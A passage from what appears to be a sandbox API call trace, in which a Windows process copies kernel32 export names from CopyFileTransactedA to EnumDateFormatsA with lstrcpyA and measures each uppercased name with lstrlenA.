lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.001] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.001] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.001] lstrlenA (lpString="COPYFILEW") returned 9 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.001] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.002] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.002] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.002] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.002] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.002] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.002] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.002] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.002] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.002] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.002] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.002] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.002] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.002] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.002] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.002] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.002] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.002] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.002] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.002] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.003] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.003] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.003] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.003] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.003] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.003] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.003] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.003] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.003] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.003] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.003] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.003] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.003] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.003] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.003] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.003] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.003] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.003] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.003] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.003] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.004] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.004] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.004] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.004] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.004] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.004] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.004] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.004] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.004] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.004] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.004] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.004] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.004] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.004] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.004] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.004] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.004] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.005] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.005] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.005] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.005] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.005] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.005] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.005] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.005] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.005] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.005] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.005] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.005] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.005] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.005] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.005] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.005] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.005] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.005] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.005] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.006] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.006] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.006] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.006] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.006] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.006] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.006] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.006] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.006] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.006] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.006] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.006] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.006] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.006] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.006] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.006] lstrlenA (lpString="DELETEATOM") returned 10 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.006] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.006] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.007] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.007] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.007] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.007] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.007] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.007] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.007] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.007] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.007] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.007] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.007] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.007] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.007] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.007] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.007] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.007] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.007] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.007] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.007] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.008] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.008] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.008] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.008] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.008] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.008] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.008] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.008] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.008] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.008] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.008] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.008] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.008] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.008] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.008] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.008] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 